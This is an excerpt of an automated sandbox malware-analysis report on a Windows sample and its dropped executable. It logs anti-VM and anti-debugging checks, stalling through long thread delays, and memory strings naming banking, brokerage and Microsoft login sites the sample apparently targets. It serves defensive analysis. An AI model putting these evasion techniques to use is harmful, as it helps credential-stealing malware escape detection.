            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: CFV20240600121.exe PID: 5640, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: BPSHhDGmARC.exe PID: 1288, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory allocated: 31D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory allocated: 31D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory allocated: 51D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory allocated: 7BF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory allocated: 8BF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory allocated: 8D90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory allocated: 9D90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory allocated: A460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory allocated: B460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory allocated: C460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeMemory allocated: DB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeMemory allocated: 7310000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeMemory allocated: 8310000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeMemory allocated: 84B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeMemory allocated: 94B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeMemory allocated: 9A50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeMemory allocated: 7310000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0141096E rdtsc 12_2_0141096E
            Source: C:\Users\user\Desktop\CFV20240600121.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4992Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4574Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 405Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 4705
            Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 5267
            Source: C:\Users\user\Desktop\CFV20240600121.exeAPI coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\CFV20240600121.exe TID: 1124Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1644Thread sleep count: 4992 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2952Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4696Thread sleep count: 237 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe TID: 7204Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 7616Thread sleep count: 4705 > 30
            Source: C:\Windows\SysWOW64\write.exe TID: 7616Thread sleep time: -9410000s >= -30000s
            Source: C:\Windows\SysWOW64\write.exe TID: 7616Thread sleep count: 5267 > 30
            Source: C:\Windows\SysWOW64\write.exe TID: 7616Thread sleep time: -10534000s >= -30000s
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe TID: 7648Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe TID: 7648Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe TID: 7648Thread sleep time: -57000s >= -30000s
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe TID: 7648Thread sleep count: 39 > 30
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe TID: 7648Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\CFV20240600121.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: _R39449.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: _R39449.21.drBinary or memory string: discord.comVMware20,11696428655f
            Source: _R39449.21.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: _R39449.21.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: _R39449.21.drBinary or memory string: global block list test formVMware20,11696428655
            Source: _R39449.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: _R39449.21.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: _R39449.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: _R39449.21.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: _R39449.21.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: _R39449.21.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: _R39449.21.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: _R39449.21.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: _R39449.21.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: _R39449.21.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: write.exe, 00000015.00000002.4523478744.0000000002FE5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2669794434.000001D53750C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: _R39449.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: _R39449.21.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: _R39449.21.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: _R39449.21.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: _R39449.21.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: _R39449.21.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: _R39449.21.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: _R39449.21.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: _R39449.21.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: _R39449.21.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: _R39449.21.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: _R39449.21.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: _R39449.21.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524176602.0000000000BAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
            Source: CFV20240600121.exe, 00000000.00000002.2087088966.0000000001555000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\`MX
            Source: _R39449.21.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: _R39449.21.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: _R39449.21.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0141096E rdtsc 12_2_0141096E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_00417633 LdrLoadDll,12_2_00417633
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01464144 mov eax, dword ptr fs:[00000030h]12_2_01464144
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01464144 mov eax, dword ptr fs:[00000030h]12_2_01464144
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01464144 mov ecx, dword ptr fs:[00000030h]12_2_01464144
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01464144 mov eax, dword ptr fs:[00000030h]12_2_01464144
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01464144 mov eax, dword ptr fs:[00000030h]12_2_01464144
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01468158 mov eax, dword ptr fs:[00000030h]12_2_01468158
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4164 mov eax, dword ptr fs:[00000030h]12_2_014A4164
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4164 mov eax, dword ptr fs:[00000030h]12_2_014A4164
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E10E mov eax, dword ptr fs:[00000030h]12_2_0147E10E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E10E mov ecx, dword ptr fs:[00000030h]12_2_0147E10E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E10E mov eax, dword ptr fs:[00000030h]12_2_0147E10E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E10E mov eax, dword ptr fs:[00000030h]12_2_0147E10E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E10E mov ecx, dword ptr fs:[00000030h]12_2_0147E10E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E10E mov eax, dword ptr fs:[00000030h]12_2_0147E10E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E10E mov eax, dword ptr fs:[00000030h]12_2_0147E10E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E10E mov ecx, dword ptr fs:[00000030h]12_2_0147E10E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E10E mov eax, dword ptr fs:[00000030h]12_2_0147E10E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147E10E mov ecx, dword ptr fs:[00000030h]12_2_0147E10E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01490115 mov eax, dword ptr fs:[00000030h]12_2_01490115
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147A118 mov ecx, dword ptr fs:[00000030h]12_2_0147A118
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147A118 mov eax, dword ptr fs:[00000030h]12_2_0147A118
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147A118 mov eax, dword ptr fs:[00000030h]12_2_0147A118
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147A118 mov eax, dword ptr fs:[00000030h]12_2_0147A118
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01400124 mov eax, dword ptr fs:[00000030h]12_2_01400124
